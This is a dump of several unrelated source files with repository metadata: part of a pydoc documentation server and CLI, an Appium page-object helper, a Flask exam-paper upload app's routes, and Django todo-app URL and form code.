        self.output.write('\n%s\n' % ''.join(wrapped_text))
def _gettopic(self, topic, more_xrefs=''):
    """Return unbuffered tuple of (topic, xrefs).

    If an error occurs here, the exception is caught and displayed by
    the url handler.

    This function duplicates the showtopic method but returns its
    result directly so it can be formatted for display in an html page.
    """
    try:
        import pydoc_data.topics
    except ImportError:
        return('''
Sorry, topic and keyword documentation is not available because the
module "pydoc_data.topics" could not be found.
''', '')
    target = self.topics.get(topic, self.keywords.get(topic))
    if not target:
        raise ValueError('could not find topic')
    if isinstance(target, str):
        # String alias to another topic: resolve recursively.
        return self._gettopic(target, more_xrefs)
    label, xrefs = target
    doc = pydoc_data.topics.topics[label]
    if more_xrefs:
        xrefs = (xrefs or '') + ' ' + more_xrefs
    return doc, xrefs
def showsymbol(self, symbol):
    """Show help for a punctuation symbol via its underlying topic.

    Table values look like "TOPIC [XREF ...]": the first word names
    the topic page, the remainder are related-topic cross references.
    """
    parts = self.symbols[symbol].split(' ', 1)
    topic = parts[0]
    xrefs = parts[1] if len(parts) > 1 else ''
    self.showtopic(topic, xrefs)
def listmodules(self, key=''):
    """List modules whose name/summary contains *key*, or all of them."""
    if key:
        self.output.write('''
Here is a list of modules whose name or summary contains '{}'.
If there are any, enter a module name to get more help.
'''.format(key))
        apropos(key)
    else:
        self.output.write('''
Please wait a moment while I gather a list of all available modules...
''')
        # Collect only top-level module names (no dotted submodules).
        modules = {}
        def callback(path, modname, desc, modules=modules):
            if modname and modname[-9:] == '.__init__':
                modname = modname[:-9] + ' (package)'
            if modname.find('.') < 0:
                modules[modname] = 1
        def onerror(modname):
            # Modules that fail to import are still listed by name.
            callback(None, modname, None)
        ModuleScanner().run(callback, onerror=onerror)
        self.list(modules.keys())
        self.output.write('''
Enter any module name to get more help. Or, type "modules spam" to search
for modules whose name or summary contain the string "spam".
''')
# Module-level singleton; the interactive interpreter's help() ends up here.
help = Helper()
class ModuleScanner:
    """An interruptible scanner that searches module synopses."""

    def run(self, callback, key=None, completer=None, onerror=None):
        """Walk all importable modules, reporting each via *callback*.

        callback(path, modname, desc) is invoked for every module (or,
        when *key* is given, only those whose "name - synopsis" string
        contains it, case-insensitively). Setting self.quit from
        another thread aborts the walk; *completer* runs at the end.
        """
        if key: key = key.lower()
        self.quit = False
        seen = {}
        # Built-in modules first: no source to scan, use __doc__.
        for modname in sys.builtin_module_names:
            if modname != '__main__':
                seen[modname] = 1
                if key is None:
                    callback(None, modname, '')
                else:
                    name = __import__(modname).__doc__ or ''
                    desc = name.split('\n')[0]
                    name = modname + ' - ' + desc
                    if name.lower().find(key) >= 0:
                        callback(None, modname, desc)
        # Then everything reachable on sys.path.
        for importer, modname, ispkg in pkgutil.walk_packages(onerror=onerror):
            if self.quit:
                break
            if key is None:
                callback(None, modname, '')
            else:
                try:
                    spec = pkgutil._get_spec(importer, modname)
                except SyntaxError:
                    # raised by tests for bad coding cookies or BOM
                    continue
                loader = spec.loader
                if hasattr(loader, 'get_source'):
                    # Prefer reading the synopsis from source: avoids
                    # importing (and executing) the module.
                    try:
                        source = loader.get_source(modname)
                    except Exception:
                        if onerror:
                            onerror(modname)
                        continue
                    desc = source_synopsis(io.StringIO(source)) or ''
                    if hasattr(loader, 'get_filename'):
                        path = loader.get_filename(modname)
                    else:
                        path = None
                else:
                    # No source available: actually load the module.
                    _spec = importlib._bootstrap._SpecMethods(spec)
                    try:
                        module = _spec.load()
                    except ImportError:
                        if onerror:
                            onerror(modname)
                        continue
                    desc = (module.__doc__ or '').splitlines()[0]
                    path = getattr(module, '__file__', None)
                name = modname + ' - ' + desc
                if name.lower().find(key) >= 0:
                    callback(path, modname, desc)
        if completer:
            completer()
def apropos(key):
    """Print all the one-line module summaries that contain a substring."""
    def callback(path, modname, desc):
        # Render package __init__ modules as "pkg (package)".
        if modname[-9:] == '.__init__':
            modname = modname[:-9] + ' (package)'
        print(modname, desc and '- ' + desc)
    def onerror(modname):
        # Best-effort scan: silently skip modules that fail to import.
        pass
    with warnings.catch_warnings():
        warnings.filterwarnings('ignore') # ignore problems during import
        ModuleScanner().run(callback, key, onerror=onerror)
# --------------------------------------- enhanced Web browser interface
def _start_server(urlhandler, port):
    """Start an HTTP server thread on a specific port.

    Start an HTML/text server thread, so HTML or text documents can be
    browsed dynamically and interactively with a Web browser. Example use:

    >>> import time
    >>> import pydoc

    Define a URL handler. To determine what the client is asking
    for, check the URL and content_type.

    Then get or generate some text or HTML code and return it.

    >>> def my_url_handler(url, content_type):
    ...     text = 'the URL sent was: (%s, %s)' % (url, content_type)
    ...     return text

    Start server thread on port 0.
    If you use port 0, the server will pick a random port number.
    You can then use serverthread.port to get the port number.

    >>> port = 0
    >>> serverthread = pydoc._start_server(my_url_handler, port)

    Check that the server is really started. If it is, open browser
    and get first page. Use serverthread.url as the starting page.

    >>> if serverthread.serving:
    ...     import webbrowser

    The next two lines are commented out so a browser doesn't open if
    doctest is run on this module.

    #...    webbrowser.open(serverthread.url)
    #True

    Let the server do its thing. We just need to monitor its status.
    Use time.sleep so the loop doesn't hog the CPU.

    >>> starttime = time.time()
    >>> timeout = 1 #seconds

    This is a short timeout for testing purposes.

    >>> while serverthread.serving:
    ...     time.sleep(.01)
    ...     if serverthread.serving and time.time() - starttime > timeout:
    ...         serverthread.stop()
    ...         break

    Print any errors that may have occurred.

    >>> print(serverthread.error)
    None
    """
    import http.server
    import email.message
    import select
    import threading

    class DocHandler(http.server.BaseHTTPRequestHandler):

        def do_GET(self):
            """Process a request from an HTML browser.

            The URL received is in self.path.
            Get an HTML page from self.urlhandler and send it.
            """
            if self.path.endswith('.css'):
                content_type = 'text/css'
            else:
                content_type = 'text/html'
            self.send_response(200)
            self.send_header('Content-Type', content_type)
            self.end_headers()
            self.wfile.write(self.urlhandler(
                self.path, content_type).encode('utf-8'))

        def log_message(self, *args):
            # Don't log messages.
            pass

    class DocServer(http.server.HTTPServer):

        def __init__(self, port, callback):
            # Legacy and/or conditional: effectively 'localhost' on all
            # modern platforms ('mac' was classic Mac OS).
            self.host = (sys.platform == 'mac') and '127.0.0.1' or 'localhost'
            self.address = ('', port)
            self.callback = callback
            # `base` and `handler` are injected as class attributes by
            # ServerThread.run() below before instantiation.
            self.base.__init__(self, self.address, self.handler)
            self.quit = False

        def serve_until_quit(self):
            # Poll the listening socket with a 1s timeout so self.quit
            # (set from another thread) is honoured promptly.
            while not self.quit:
                rd, wr, ex = select.select([self.socket.fileno()], [], [], 1)
                if rd:
                    self.handle_request()
            self.server_close()

        def server_activate(self):
            self.base.server_activate(self)
            if self.callback:
                self.callback(self)

    class ServerThread(threading.Thread):

        def __init__(self, urlhandler, port):
            self.urlhandler = urlhandler
            self.port = int(port)
            threading.Thread.__init__(self)
            self.serving = False
            self.error = None

        def run(self):
            """Start the server."""
            try:
                DocServer.base = http.server.HTTPServer
                DocServer.handler = DocHandler
                DocHandler.MessageClass = email.message.Message
                DocHandler.urlhandler = staticmethod(self.urlhandler)
                docsvr = DocServer(self.port, self.ready)
                self.docserver = docsvr
                docsvr.serve_until_quit()
            except Exception as e:
                # Surface startup/serving failures to the waiting caller.
                self.error = e

        def ready(self, server):
            # Called once the server socket is bound and activated.
            self.serving = True
            self.host = server.host
            self.port = server.server_port
            self.url = 'http://%s:%d/' % (self.host, self.port)

        def stop(self):
            """Stop the server and this thread nicely"""
            self.docserver.quit = True
            self.serving = False
            self.url = None

    thread = ServerThread(urlhandler, port)
    thread.start()
    # Wait until thread.serving is True to make sure we are
    # really up before returning.
    while not thread.error and not thread.serving:
        time.sleep(.01)
    return thread
# Stylesheet served with HTML pages; overridable via the -c CLI option.
CSS_PATH = "pydoc_data/pydoc.css"
def _url_handler(url, content_type="text/html"):
    """The pydoc url handler for use with the pydoc server.

    If the content_type is 'text/css', the css style
    sheet is read and returned if it exists.

    If the content_type is 'text/html', then the result of
    get_html_page(url) is returned.
    """
    class _HTMLDoc(HTMLDoc):

        def page(self, title, contents):
            """Format an HTML page."""
            return '''<!doctype html>
<html><head><title>Mod_Pydoc: {}</title><meta charset="utf-8">
<link href="{}" rel="stylesheet">
</head><body>{}
<div class="main">{}</div>
</body></html>'''.format(title, CSS_PATH, html_navbar(), contents)

        def filelink(self, url, path):
            # Source links go through the getfile handler below.
            return '<a href="getfile?key=%s">%s</a>' % (url, path)

    html = _HTMLDoc()

    def html_navbar():
        """Header shown on every page: interpreter info plus nav links."""
        version = html.escape("%s [%s, %s]" % (platform.python_version(),
                                               platform.python_build()[0],
                                               platform.python_compiler()))
        return """
<div style='float:left'>
Python %s<br>%s
</div>
<div style='float:right'>
<div style='text-align:center'>
<a href="index.html">Module Index</a>
: <a href="topics.html">Topics</a>
: <a href="keywords.html">Keywords</a>
</div>
<div>
<form action="get" style='display:inline;'>
<input type=text name=key size=15>
<input type=submit value="Get">
</form>
<form action="search" style='display:inline;'>
<input type=text name=key size=15>
<input type=submit value="Search">
</form>
</div>
</div>
""" % (version, html.escape(platform.platform(terse=True)))

    def html_index():
        """Module Index page."""
        def bltinlink(name):
            return '<a href="%s.html">%s</a>' % (name, name)
        heading = html.heading('<span>Index of Modules</span>')
        names = [name for name in sys.builtin_module_names
                 if name != '__main__']
        contents = html.multicolumn(names, bltinlink)
        contents = [heading, '<p>' + html.bigsection('Built-in Modules',
                    contents, css_class="builtin_modules")]
        seen = {}
        # One index section per sys.path entry; `seen` de-duplicates.
        for dir in sys.path:
            contents.append(html.index(dir, seen))
        contents.append(
            '<p class="ka_ping_yee"><strong>pydoc</strong> by Ka-Ping Yee'
            '<ping@lfw.org></p>')
        return 'Index of Modules', ''.join(contents)

    def html_search(key):
        """Search results page."""
        # scan for modules
        search_result = []
        def callback(path, modname, desc):
            if modname[-9:] == '.__init__':
                modname = modname[:-9] + ' (package)'
            search_result.append((modname, desc and '- ' + desc))
        with warnings.catch_warnings():
            warnings.filterwarnings('ignore') # ignore problems during import
            ModuleScanner().run(callback, key)
        # format page
        def bltinlink(name):
            return '<a href="%s.html">%s</a>' % (name, name)
        results = []
        heading = html.heading('Search Results')
        for name, desc in search_result:
            results.append(bltinlink(name) + desc)
        contents = heading + html.bigsection('key = {}'.format(key),
                                             '<br>'.join(results), css_class="search")
        return 'Search Results', contents

    def html_getfile(path):
        """Get and display a source file listing safely."""
        # Undo the %20 encoding used by filelink() above.
        path = path.replace('%20', ' ')
        with tokenize.open(path) as fp:
            lines = html.escape(fp.read())
        body = '<pre>%s</pre>' % lines
        heading = html.heading('File Listing')
        contents = heading + html.bigsection('File: {}'.format(path), body,
                                             css_class="getfile")
        return 'getfile %s' % path, contents

    def html_topics():
        """Index of topic texts available."""
        def bltinlink(name):
            return '<a href="topic?key=%s">%s</a>' % (name, name)
        heading = html.heading('Index of Topics')
        names = sorted(Helper.topics.keys())
        contents = html.multicolumn(names, bltinlink)
        contents = heading + html.bigsection('Topics', contents, css_class="topics")
        return 'Topics', contents

    def html_keywords():
        """Index of keywords."""
        heading = html.heading('Index of Keywords')
        names = sorted(Helper.keywords.keys())
        def bltinlink(name):
            return '<a href="topic?key=%s">%s</a>' % (name, name)
        contents = html.multicolumn(names, bltinlink)
        contents = heading + html.bigsection('Keywords', contents, css_class="keywords")
        return 'Keywords', contents

    def html_topicpage(topic):
        """Topic or keyword help page."""
        # Render the plain-text topic through a buffered Helper.
        buf = io.StringIO()
        htmlhelp = Helper(buf, buf)
        contents, xrefs = htmlhelp._gettopic(topic)
        if topic in htmlhelp.keywords:
            title = 'Keyword'
        else:
            title = 'Topic'
        heading = html.heading(title)
        contents = '<pre>%s</pre>' % html.markup(contents)
        contents = html.bigsection(topic, contents, css_class="topics")
        if xrefs:
            xrefs = sorted(xrefs.split())
            def bltinlink(name):
                return '<a href="topic?key=%s">%s</a>' % (name, name)
            xrefs = html.multicolumn(xrefs, bltinlink)
            xrefs = html.html_section('Related help topics: ', xrefs,
                                      css_class="topics")
        return ('%s %s' % (title, topic),
                ''.join((heading, contents, xrefs)))

    def html_getobj(url):
        # Document an arbitrary named object ('None' is itself valid).
        obj = locate(url, forceload=1)
        if obj is None and url != 'None':
            raise ValueError('could not find object')
        title = describe(obj)
        content = html.document(obj, url)
        return title, content

    def html_error(url, exc):
        heading = html.heading('Error')
        contents = '<br>'.join(html.escape(line) for line in
                               format_exception_only(type(exc), exc))
        contents = heading + html.bigsection(url, contents, css_class="error")
        return "Error - %s" % url, contents

    def get_html_page(url):
        """Generate an HTML page for url."""
        complete_url = url
        if url.endswith('.html'):
            url = url[:-5]
        try:
            if url in ("", "index"):
                title, content = html_index()
            elif url == "topics":
                title, content = html_topics()
            elif url == "keywords":
                title, content = html_keywords()
            elif '=' in url:
                # Query-style URLs: "<op>=<key>".
                op, _, url = url.partition('=')
                if op == "search?key":
                    title, content = html_search(url)
                elif op == "getfile?key":
                    title, content = html_getfile(url)
                elif op == "topic?key":
                    # try topics first, then objects.
                    try:
                        title, content = html_topicpage(url)
                    except ValueError:
                        title, content = html_getobj(url)
                elif op == "get?key":
                    # try objects first, then topics.
                    if url in ("", "index"):
                        title, content = html_index()
                    else:
                        try:
                            title, content = html_getobj(url)
                        except ValueError:
                            title, content = html_topicpage(url)
                else:
                    raise ValueError('bad pydoc url')
            else:
                title, content = html_getobj(url)
        except Exception as exc:
            # Catch any errors and display them in an error page.
            title, content = html_error(complete_url, exc)
        return html.page(title, content)

    if url.startswith('/'):
        url = url[1:]
    if url.endswith('.css'):
        # Serve the stylesheet: prefer a file relative to cwd, else the
        # bundled CSS_PATH next to this module.
        if os.path.isfile(url):
            css_path = url
        else:
            path_here = os.path.dirname(os.path.realpath(__file__))
            css_path = os.path.join(path_here, CSS_PATH)
        with open(css_path) as fp:
            return ''.join(fp.readlines())
    elif content_type == 'text/html':
        return get_html_page(url)
    # Errors outside the url handler are caught by the server.
    raise TypeError('unknown content type %r for url %s' % (content_type, url))
def browse(port=0, *, open_browser=True):
    """Start the enhanced pydoc Web server and open a Web browser.

    Use port '0' to start the server on an arbitrary port.
    Set open_browser to False to suppress opening a browser.
    """
    import webbrowser
    serverthread = _start_server(_url_handler, port)
    if serverthread.error:
        print(serverthread.error)
        return
    if serverthread.serving:
        server_help_msg = 'Server commands: [b]rowser, [q]uit'
        if open_browser:
            webbrowser.open(serverthread.url)
        try:
            print('Server ready at', serverthread.url)
            print(server_help_msg)
            # Tiny command loop controlling the background server thread.
            while serverthread.serving:
                cmd = input('server> ')
                cmd = cmd.lower()
                if cmd == 'q':
                    break
                elif cmd == 'b':
                    webbrowser.open(serverthread.url)
                else:
                    print(server_help_msg)
        except (KeyboardInterrupt, EOFError):
            print()
        finally:
            # Always shut the server down cleanly, even on Ctrl-C/EOF.
            if serverthread.serving:
                serverthread.stop()
                print('Server stopped')
# -------------------------------------------------- command-line interface
def ispath(x):
    """Return True if *x* is a string containing a path separator."""
    return isinstance(x, str) and os.sep in x
def cli():
    """Command-line interface (looks at sys.argv to decide what to do)."""
    import getopt
    class BadUsage(Exception): pass

    global CSS_PATH
    # Scripts don't get the current directory in their path by default
    # unless they are run with the '-m' switch
    if '' not in sys.path:
        scriptdir = os.path.dirname(sys.argv[0])
        if scriptdir in sys.path:
            sys.path.remove(scriptdir)
        sys.path.insert(0, '.')
    try:
        opts, args = getopt.getopt(sys.argv[1:], 'bkc:p:w')
        writing = False
        start_server = False
        open_browser = False
        port = None
        for opt, val in opts:
            if opt == '-b':
                start_server = True
                open_browser = True
            if opt == '-k':
                # Keyword search and exit immediately.
                apropos(val)
                return
            if opt == '-p':
                start_server = True
                port = val
            if opt == '-w':
                writing = True
            if opt == '-c':
                # 'classic' selects the original pydoc stylesheet; any
                # other value is used as a css path if it exists on disk.
                if val == "classic":
                    CSS_PATH = "pydoc_data/pydoc_orig.css"
                else:
                    css_ = os.path.join(os.getcwd(), val)
                    if os.path.isfile(css_):
                        CSS_PATH = val
        if start_server:
            if port is None:
                port = 0
            browse(port, open_browser=open_browser)
            return
        if not args: raise BadUsage
        for arg in args:
            if ispath(arg) and not os.path.exists(arg):
                print('file %r does not exist' % arg)
                break
            try:
                # A path argument names a source file to document.
                if ispath(arg) and os.path.isfile(arg):
                    arg = importfile(arg)
                if writing:
                    if ispath(arg) and os.path.isdir(arg):
                        writedocs(arg)
                    else:
                        writedoc(arg)
                else:
                    help.help(arg)
            except ErrorDuringImport as value:
                print(value)
    except (getopt.error, BadUsage):
        # Usage text, printed for bad options or missing arguments.
        cmd = os.path.splitext(os.path.basename(sys.argv[0]))[0]
        print("""pydoc - the Python documentation tool
{cmd} <name> ...
Show text documentation on something. <name> may be the name of a
Python keyword, topic, function, module, or package, or a dotted
reference to a class or function within a module or module in a
package. If <name> contains a '{sep}', it is used as the path to a
Python source file to document. If name is 'keywords', 'topics',
or 'modules', a listing of these things is displayed.
{cmd} -k <keyword>
Search for a keyword in the synopsis lines of all available modules.
{cmd} -p <port>
Start an HTTP server on the given port on the local machine. Port
number 0 can be used to get an arbitrary unused port.
{cmd} -b
Start an HTTP server on an arbitrary unused port and open a Web browser
to interactively browse documentation. The -p option can be used with
the -b option to explicitly specify the server port.
{cmd} -w <name> ...
Write out the HTML documentation for a module to a file in the current
directory. If <name> contains a '{sep}', it is treated as a filename; if
it names a directory, documentation is written for all the contents.
{cmd} -c <name>
Alternate choice for styling option. If name == classic, the color scheme
used mimics the original pydoc style. If a valid css file path is given
(relative to the server), it is used instead.
""".format(cmd=cmd, sep=os.sep))
if __name__ == '__main__':
cli()
|
[
"andre.roberge@gmail.com"
] |
andre.roberge@gmail.com
|
5ca221bad2a6b50e82b27345b2e7ece02878aba1
|
7d12d1a7d840414f3ae3cf03173b1e4722640ba1
|
/appium_jike/page/config_page.py
|
4982e3d843ec3704ae19defbb555f87cec1a4082
|
[] |
no_license
|
liuchengxu11/sunxing
|
e8927b4898c942eb03494aa49cb5bb66fd69dceb
|
cd2002abeebdc38d332246e1ea0e597896493a8b
|
refs/heads/master
| 2021-01-16T13:47:01.082002
| 2020-03-29T11:35:27
| 2020-03-29T11:35:27
| 243,142,564
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,893
|
py
|
from selenium.webdriver.common.by import By
from selenium.webdriver.remote.webdriver import WebDriver
import time
class Config_page:
    """Appium page-object base: element helpers with popup dismissal.

    Every lookup/click/type helper retries once after calling
    handle_exception(), which dismisses known popups/ads.
    """

    # Locators for popups/ads that can appear at any point during a run;
    # handle_exception() taps the first one it finds to dismiss it.
    _black_list = [
        (By.XPATH,
         "/hierarchy/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.ImageView[2]"),
    ]

    def __init__(self, driver: WebDriver):
        self.driver = driver

    def find_element(self, locator):
        """Find an element; on failure, dismiss popups and retry once."""
        print(locator)
        try:
            return self.driver.find_element(*locator)
        except BaseException:
            self.handle_exception()
            # self.find_element(locator)
            return self.driver.find_element(*locator)

    def find_element_and_click(self, locator):
        # A plain click can also raise (e.g. a popup appears mid-tap),
        # so wrap the click with the same dismiss-and-retry logic.
        print("click")
        try:
            self.find_element(locator).click()
        except:
            self.handle_exception()
            self.find_element(locator).click()

    def find_element_and_send(self, locator, sendkeys="", dian=None):
        # Type *sendkeys* into the element at *locator*; *dian* is an
        # optional confirm-button locator tapped after the text is entered.
        print("sendkkeys={}".format(sendkeys))
        if dian is not None:
            try:
                self.find_element(locator).click()
                self.find_element(locator).clear()
                self.find_element(locator).send_keys(sendkeys)
                self.find_element(dian).click()
            except BaseException:
                self.handle_exception()
                self.find_element(locator).click()
                self.find_element(locator).clear()
                self.find_element(locator).send_keys(sendkeys)
                self.find_element(dian).click()
        else:
            try:
                self.find_element(locator).click()
                self.find_element(locator).clear()
                self.find_element(locator).send_keys(sendkeys)
            except BaseException:
                self.handle_exception()
                self.find_element(locator).click()
                self.find_element(locator).clear()
                self.find_element(locator).send_keys(sendkeys)

    def handle_exception(self):
        """Dismiss the first visible blacklist popup, if any is present."""
        print(":exception")
        # Drop the implicit wait to 0 so the blacklist scan is fast,
        # then restore it (to 10s) once the scan is done.
        self.driver.implicitly_wait(0)
        for locator in self._black_list:
            print(locator)
            elements = self.driver.find_elements(*locator)
            if len(elements) >= 1:
                # Popup element found: tap it to close the popup/ad.
                elements[0].click()
            else:
                print("%s not found" % str(locator))
        self.driver.implicitly_wait(10)
|
[
"meiqianchifa@163.com"
] |
meiqianchifa@163.com
|
dee88f1bf71213b63a17310865bbb65489377dbf
|
55ecf7684f25a5932edab1a2c2533aa9c7a65fc0
|
/app/routes.py
|
e4deec4a01b36913addabfa4886748606d809167
|
[] |
no_license
|
linxumelon/examplifier
|
87184265b80a2b09edb162699a945b2750dcb19f
|
d266b145c97e76e610ee1bbe73e32081218fdf4e
|
refs/heads/main
| 2023-01-10T11:00:09.297474
| 2020-11-07T07:20:56
| 2020-11-07T07:20:56
| 308,389,916
| 0
| 0
| null | 2020-11-07T07:20:57
| 2020-10-29T16:40:57
|
Python
|
UTF-8
|
Python
| false
| false
| 6,518
|
py
|
import os
import sys
from flask_login import current_user, login_user, login_required, logout_user
from flask import render_template, flash, redirect, url_for, request, send_from_directory
from werkzeug.utils import secure_filename
from werkzeug.urls import url_parse
from app import app
from app import db
from app.forms import LoginForm, UploadTestFileForm, AddModuleForm, RegistrationForm, IDENTITY_CHOICES
from app.models import User, Module, Teaches, Takes, TestPaper, StudentSubmission
from sqlalchemy import and_, or_, not_
ALLOWED_EXTENSIONS = {'txt', 'pdf', 'png', 'jpg', 'jpeg'}
BASEDIR = os.path.dirname(app.instance_path)
@app.route('/')
@app.route('/index')
def index():
    """Home page; anonymous visitors are sent to the login page."""
    if current_user.is_authenticated:
        print("basedir = {}".format(BASEDIR))
        return render_template("index.html", title='Home Page')
    return redirect(url_for('login'))
@app.route('/teaching_modules', methods=['GET'])
@login_required
def get_teaching_mods():
    """List every module the logged-in instructor teaches."""
    taught = Teaches.query.filter_by(instructor_id=current_user.id).all()
    return render_template(
        'teaching_modules.html',
        title='Teaching Modules',
        user=current_user,
        modules=taught,
    )
@app.route('/query_test_papers', methods=['GET'])
@login_required
def query_test_papers():
    """Show the module picker for browsing uploaded test papers."""
    taught = Teaches.query.filter_by(instructor_id=current_user.id).all()
    return render_template(
        'query_test_papers.html',
        title='Query Test Papers',
        user=current_user,
        modules=taught,
    )
@app.route('/view_test_papers/<module>', methods=['GET'])
@login_required
def view_test_papers(module):
    """List every test paper stored for *module*."""
    papers = TestPaper.query.filter_by(modcode=module).all()
    return render_template('view_test_papers.html', title='View Test Papers',
                           user=current_user, test_papers=papers,
                           module=module)
@app.route('/download/<module>/<filename>')
@login_required
def download_test_paper(module, filename):
    """Send a stored test paper back to the browser as an attachment.

    Fix: ``str.replace`` returns a new string, so the original bare
    ``filename.replace("%20", " ")`` was a no-op — names containing
    spaces never resolved on disk. The result is now reassigned.
    Leftover debug prints were removed.
    """
    moddir = os.path.join(BASEDIR, module)
    # Undo URL-style space encoding so the name matches the saved file.
    filename = filename.replace("%20", " ")
    return send_from_directory(moddir, filename, as_attachment=True)
@app.route('/upload_test_file', methods=['GET', 'POST'])
@login_required
def upload_test_file():
    """Accept a test-paper upload for a module the current user teaches.

    Fix: removed leftover debug prints ("heeelllooooo", "heyyyyyy!",
    "its not valid", filename/fileurl dumps). Logic is unchanged.
    """
    form = UploadTestFileForm()
    if form.validate_on_submit():
        modcode = secure_filename(form.modcode.data)
        # Reject uploads for modules this instructor does not teach
        # (IsCurrentUserTeachingMod flashes the explanation itself).
        if not IsCurrentUserTeachingMod(modcode):
            return render_template("upload_test_file.html",
                                   title='Upload Test File', form=form)
        testfile = form.testfile.data
        filename = secure_filename(testfile.filename)
        moddir = os.path.join(BASEDIR, modcode)
        # De-duplicate by appending a counter suffix.
        # NOTE(review): the suffix lands after the extension
        # ("a.pdf (1)"); confirm whether "a (1).pdf" was intended.
        files_with_given_name = TestPaper.query.filter_by(
            modcode=modcode, name=filename).all()
        if len(files_with_given_name) > 0:
            filename = filename + " ({})".format(len(files_with_given_name))
        fileurl = os.path.join(moddir, filename)
        # Record the paper in the database, then persist the bytes.
        file_record = TestPaper(modcode=modcode, name=filename)
        db.session.add(file_record)
        db.session.commit()
        testfile.save(fileurl)
        flash('File successfully uploaded')
        return redirect(url_for('index'))
    return render_template("upload_test_file.html",
                           title='Upload Test File', form=form)
@app.route('/add_module', methods=['GET', 'POST'])
@login_required
def create_module():
    """Create a module (directory + DB row) and a Teaches record for
    the current user, skipping whatever already exists."""
    form = AddModuleForm()
    if form.validate_on_submit():
        modcode = secure_filename(form.modcode.data)
        dir_path = os.path.join(BASEDIR, modcode)
        # The directory may already exist; log the error and continue.
        try:
            os.mkdir(dir_path)
        except Exception as e:
            print("Error when making module directory: \n{}".format(e))
        # Insert the Module row only if this code is new.
        module = Module.query.filter_by(code=modcode).first()
        if module is None:
            module = Module(code=modcode)
            print("module = {}".format(module))
            db.session.add(module)
            db.session.commit()
        # Link the current instructor to the module, once.
        teaches = Teaches.query.filter_by(modcode=modcode, instructor_id=current_user.id).first()
        if teaches is None:
            teaches = Teaches(instructor_id=current_user.id, instructor_name=current_user.username, modcode=modcode)
            print("teaches = {}".format(teaches))
            db.session.add(teaches)
            db.session.commit()
        else:
            print("Teaches exists: {}".format(teaches))
        return redirect(url_for('index'))
    return render_template('add_module.html', title='Add Module', form=form)
@app.route('/login', methods=['GET', 'POST'])
def login():
    """Authenticate a user and redirect to the originally requested page.

    Fixes: the old code dereferenced ``user.password_hash`` in a debug
    print *before* the ``user is None`` check, so an unknown username
    crashed with AttributeError — and the print also logged the password
    hash, which is sensitive and must not be printed. The print is gone.
    """
    if current_user.is_authenticated:
        return redirect(url_for('index'))
    form = LoginForm()
    if form.validate_on_submit():
        user = User.query.filter_by(username=form.username.data).first()
        # Check existence before touching any attribute on `user`.
        if user is None or not user.check_password(form.password.data):
            flash('Invalid username or password')
            return redirect(url_for('login'))
        login_user(user, remember=form.remember_me.data)
        # Only honour same-site `next` targets to avoid open redirects.
        next_page = request.args.get('next')
        if not next_page or url_parse(next_page).netloc != '':
            next_page = url_for('index')
        return redirect(next_page)
    return render_template('login.html', title='Sign In', form=form)
@app.route('/logout', methods=['GET', 'POST'])
def logout():
    """End the current session and return to the home page."""
    logout_user()
    target = url_for('index')
    return redirect(target)
@app.route('/register', methods=['GET', 'POST'])
def register():
    """Create a new account and redirect to the login page.

    Fix: removed the leftover debug print of ``user.identity``.
    """
    if current_user.is_authenticated:
        return redirect(url_for('index'))
    form = RegistrationForm()
    if form.validate_on_submit():
        # Map the submitted choice key to its display label.
        identity = dict(IDENTITY_CHOICES).get(form.identity.data)
        user = User(id=form.id.data, username=form.username.data,
                    email=form.email.data, identity=identity)
        user.set_password(form.password.data)
        db.session.add(user)
        db.session.commit()
        flash('Congratulations, you are now a registered user!')
        return redirect(url_for('login'))
    return render_template('register.html', title='Register', form=form)
def IsCurrentUserTeachingMod(modcode):
    """Return True if the current user has a Teaches record for *modcode*.

    Flashes an explanatory message (and returns False) when no record
    exists.
    """
    record = Teaches.query.filter_by(
        modcode=modcode, instructor_id=current_user.id).first()
    if record is not None:
        return True
    flash("No teaching record for this module. \n Please add module first if you are teaching this module. ")
    return False
|
[
"pollylin0617@gmail.com"
] |
pollylin0617@gmail.com
|
b576010e7db6584318f67fabd54e234ca64dbfcb
|
90d78ab5fc6179bab30a2d4f1205535b11f3c335
|
/base/urls.py
|
a12a9357a0499497c25d439d9b3835f353c9c626
|
[
"MIT"
] |
permissive
|
Rpetrizzo-C/todo-challenge
|
9480bf84e66ae311d4050f86c62cc2925bad493e
|
0c34a07efc17f4f83979f5df236c74180b371d8d
|
refs/heads/main
| 2023-07-29T12:37:46.790407
| 2021-08-30T21:54:22
| 2021-08-30T21:54:22
| 401,495,843
| 0
| 0
|
MIT
| 2021-08-30T21:52:46
| 2021-08-30T21:52:45
| null |
UTF-8
|
Python
| false
| false
| 922
|
py
|
from django.urls import path
from .views import (TaskListView, TaskDetailView, TaskCreateView,
TaskUpdateView, TaskDeleteView, CustomLoginView,
RegisterPageView, TaskReorderView)
from django.contrib.auth.views import LogoutView
urlpatterns = [
    # Authentication
    path('login/', CustomLoginView.as_view(), name='login'),
    path('logout/', LogoutView.as_view(next_page='login'), name='logout'),
    path('register/', RegisterPageView.as_view(), name='register'),
    # Task CRUD
    path('', TaskListView.as_view(), name='tasks'),
    path('task/<int:pk>/', TaskDetailView.as_view(), name='task'),
    path('task-create/', TaskCreateView.as_view(), name='task-create'),
    path('task-update/<int:pk>/', TaskUpdateView.as_view(), name='task-update'),
    path('task-delete/<int:pk>/', TaskDeleteView.as_view(), name='task-delete'),
    # NOTE(review): presumably persists a drag-and-drop ordering -- confirm in TaskReorderView.
    path('task-reorder/', TaskReorderView.as_view(), name='task-reorder'),
]
|
[
"petrizzo.rodrigoa@gmail.com"
] |
petrizzo.rodrigoa@gmail.com
|
3f0a25f51728148e9027713415fc9bee3d6c31ef
|
35fd70d03a17824660a03d29c822cfeb14bb765c
|
/accounts/forms.py
|
43af801defa994016215ea0e03a417361c016f90
|
[
"MIT"
] |
permissive
|
shawon922/django-blog
|
517bef3f0b16489808858ffa34dee4affecc4c36
|
323c1c48d1afbcfe9e70d20fc8db7fde4ef007bf
|
refs/heads/master
| 2023-07-23T03:19:04.138800
| 2017-07-22T07:23:46
| 2017-07-22T07:23:46
| 73,935,675
| 4
| 3
|
MIT
| 2023-07-17T06:04:59
| 2016-11-16T15:54:28
|
Python
|
UTF-8
|
Python
| false
| false
| 2,039
|
py
|
from django import forms
from django.contrib.auth import (
authenticate,
get_user_model,
login,
logout
)
User = get_user_model()
class UserLoginForm(forms.Form):
    """Plain (non-model) login form.

    ``clean`` authenticates the submitted credentials and raises a
